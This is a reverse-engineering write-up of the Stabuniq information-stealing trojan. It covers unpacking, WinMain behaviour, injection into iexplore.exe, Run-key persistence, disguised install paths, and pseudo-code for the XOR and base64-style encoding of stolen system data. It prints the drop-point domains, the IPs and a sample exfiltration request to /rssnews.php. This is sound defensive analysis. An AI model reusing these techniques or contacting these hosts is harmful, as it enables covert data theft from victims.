Stabuniq In Depth

ssdeep

1536:3XBp/wqLHinJ8i7zY8QiLBTaM4gTKSb4JjTKT7SEKla:3zIqLHG8GzV9laMz4h+SZl

ExifTool
MIMEType	application/octet-stream
Subsystem	Windows GUI
MachineType	Intel 386 or later, and compatibles
TimeStamp	2012:03:21 23:43:39+00:00
FileType	Win32 EXE
PEType	PE32
CodeSize	12800
LinkerVersion	6.0
EP	0xf570
InitializedDataSize	9216
SubsystemVersion	4.0
ImageVersion	0.0
OSVersion	4.0
UninitializedDataSize	0

It’s possible to see that PEiD has discovered some kind of compression/encoding of original instructions using the tool Armadillo v1.71. We can predict a phase in which the analyst will recover the original executable to make subsequent code analysis easier.

Dynamic Analysis

The analyst has performed a dynamic analysis of the executable in a controlled environment. This step allows us to observe the creation of new files in the victim system (the malware copies itself into the system under a different name and a different path), the deletion of the original executable launched, the interaction with specific registry keys to order to ensure its persistence even after reboots and the injection of code inside the iexplore.exe process. It was also possible to detect network activity to some domains identified as the drop points of information gathered by the malware.

* The following are results obtained:

Dependency:

malware.exe (Analysis Subject)

iexplore.exe (Started by malware.exe)

issch.exe (Started by iexplore.exe)

File Activity of malware.exe:

Process Activity of malware.exe:

Registry Activities of malware.exe

File Activity of iexplore.exe:

Registry Activities of iexplore.exe:

Network Activities of iexplore.exe:

*
Some of the information has been truncated for space reasons.

Bypassing Code Protection

Passing over some minor instructions executed at startup by the analyzed sample, it’s possible to focus only on those operations that are performed by malware in order to recover the set of the original packed code.

At a subroutine located at 0040F060, malware begins creation of new executable structure in his own address space through a dedicated loop. The image that follows shows a broad view of this:

VirtualProtect function call is performed to change the memory protection options for a length of 60040 bytes starting at address 00400040.

Malware at this point lands on 0040F218 where there is a new loop dedicated to BYTE – BYTE structure deobfuscation starting at address 00400040 based on previous VirtualProtect function parameters.

The following is a code snippet of what has just been said:

The analyst has therefore waited the conclusion of the deobfuscation cycle and has performed the dump of the memory region useful to carve the original executable as shown in image below, in accord with VirtualProtect function parameters.

Code Analysis

The code analysis was performed on the original executable just recovered. Before this, however, the analyst submitted it to a new multi-engine anti-malware scan and recovered some useful information about it. Results are shown below:

Multi-Engine Anti-Malware Scan:

After retrieving this kind of information, the code analysis began.

Entry Point was at 00409D6F.

The first interesting set of instructions performed is a subroutine called at 00409DEE, designed to retrieve environment variables of the infected system.

The main activity of the malware however, begins at 00409E38, with the call at function _WinMain@16.

Malware goes to create “StabilityMutexString” mutex in order to check if a version of itself is already started…

and begins preparing the following system interaction with an in-memory copy of useful strings.

The malware retrieves strings about what will be…

1. Domain Names representing the drop points of the information collected (sovereutilizeignty.com, benhomelandefit.com):
   

1. Name of the page that will be contacted by malware (/rssnews.php):
   

1. The first set of possible strings through the malware will compose the path to which it will copy itself (Java Quick Starter, InstallShield Update Service Scheduler, SoundMAX service agent, AcroIEHelper Module, GrooveMonitor Utility):
   

1. Possible executable names where malware will copy itself to (jqs.exe, issch.exe, smagent.exe, acroiehelper.exe, groovemonitor.exe):
   

1. The second set of possible strings through the malware will compose the path to which it will copy itself (Update, Bin, Uninstall, Helper, Installer):
   

After conducting these operations that are necessary for subsequent interactions, the sample goes to retrieve information about system like UserName, ComputerName, SystemInfo, Address, Active Processes, etc.

Based on the returning value of the GetVersionEx function, the malware is able to retrieve the version type of the operating system and Service Pack in use.

This is done by comparing the version number with hardcoded values.

Unless the result of the operation does not lead to identify a “Windows 7” OS, the malware executes a mnemonic JMP to 0x401220 (end of subroutine); otherwise it continues the normal flow of operations expected which will lead in any case to the end of the function.

Based on the code analysis, the malware appears to be able to interact with the following operating systems:

– Windows 2000

– Windows XP

– Windows XP Professional x64

– Windows Server 2003

– Windows Home Server

– Windows Server 2003 R2

– Windows Server 2008

– Windows Server R2

– Windows 7

In our case Windows XP is identified.

The malware then goes on to perform active processes enumeration.

All the information gathered is going to generate the future HTTP POST request to domains previously shown.

An example of what was just said can be represented from following string:

sovereutilizeignty.com/rssnews.php?id=127.0.0.1&varname=Administrator&comp=EMANUELE-REM-PC… etc.etc.etc.

The only difference with the string just shown is that the malware performs the encoding of parameters (with a generated key) before making the HTTP request.

The first of these encoding subroutines is located at 0x40926F and is designed to return a string encoded with the following pseudo-code reversed algorithm:

For var1 = 0 to StringToEncode.Length

For var2 = 0 to Key.Length

Take single character of string to encoding starting at first.

Take character of key starting at first.

Perform XOR encoding of character of string to encode (for ex. 73h – s) with the character of key (for ex. 63h – c).

Move reading key of one character forward.

Loop

Move reading string of one character forward.

Loop

This is the entire code for this cycle:

The encoded string will be then passed to a subroutine located at 0x408DC7.

The second encoding function obtains correspondence between the characters of the xored string obtained from the function at 0x40926F, with a predefined set of hardcoded characters, and shown below (in simplified form) with the following pseudo-code:

For var=0 to String.Length

Take a character form string to encode starting at first.

Perform SAR instruction of character retrieved from string with hardcoded multiple of 2 (starting from 2). -> SAR ECX,(2,4,6,8)

Perform an AND instruction with the result of the previous operation and 3F.

Retrieve position of corresponding character in string

“ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/”.

Write new string.

Loop

Snippet of code of second encoding function:

At the end of procedure, a string like the following is obtained:

id=Pj04IT8hPyE&varname=fGBsY25t&comp=XEBMQ05NIj84OTlLSzg7…etc.etc.

Once this has been done, the malware comes to execute the code-injection into the C:Program FilesInternet Exploreriexplore.exe process.

This is done through CreateProcess

User View:

WriteProcessMemory

and ResumeThread functions.

Continuing with a wider view of the operations performed, the code injected goes at this point to create a copy of itself in a path generated by the combination of strings seen previously, to modify the registry keys to survive even after system reboot, and to execute HTTP POST requests to the drop points previously shown.

Malware Indicator

From a user point of view, the presence of “iexplore.exe” process running even if the browser is not currently in use, may suggest the presence of this type of malware or its variants.

Conclusions

1. General function and functionality of the malware:
   

   Stabuniq is basically an information-stealing Trojan.
   

2. Behavioral patterns of malware:
   

   The malware is able to inject its code into iexplore.exe process and run it silently to execute malicious actions. It sends out sensitive information via the HTTP protocol.
   

3. Local system interaction:
   

   Malware can copy itself into one of the following path
   

%ProgramFiles%[FOLDER NAME ONE][FOLDER NAME TWO]acroiehelper.exe

%ProgramFiles%[FOLDER NAME ONE][FOLDER NAME TWO]groovemonitor.exe

%ProgramFiles%[FOLDER NAME ONE][FOLDER NAME TWO]issch.exe

%ProgramFiles%[FOLDER NAME ONE][FOLDER NAME TWO]jqs.exe

%ProgramFiles%[FOLDER NAME ONE][FOLDER NAME TWO]smagent.exe

The variable [FOLDER NAME ONE] may be one of the following

AcroIEHelper Module

GrooveMonitor Utility

InstallShield Update Service Scheduler

Java Quick Starter

SoundMAX service agent

The variable [FOLDER NAME TWO] may be one of the following

Bin

Helper

Installer

Uninstall

Update

Malware creates the following registry entries so that it runs every time Windows starts:

HKCUSoftwareMicrosoftWindowsCurrentVersionRun”[RANDOM GUID]” = “[FILE NAME]”

HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun”[RANDOM GUID]” = “[FILE NAME]”

HKU.DEFAULTSoftwareMicrosoftWindowsCurrentVersionRun”[RANDOM GUID]” = “[FILE NAME]”

1. Network Behavior:
   

   The malware sends HTTP requests to 75.102.25.76 and 205.234.252.212. IP addresses.
   

2. Propagation Methodology:
   

   The malware does not provide methods of self-propagation. Most likely carriers of infection can be identified in sending massive or targeted spam emails or by exploiting browsers vulnerabilities.
   

3. Compiler type and country of origin:
   

Malware seems designed, or at least compiled, in the United States.

It was probably compiled with the Microsoft Visual C++.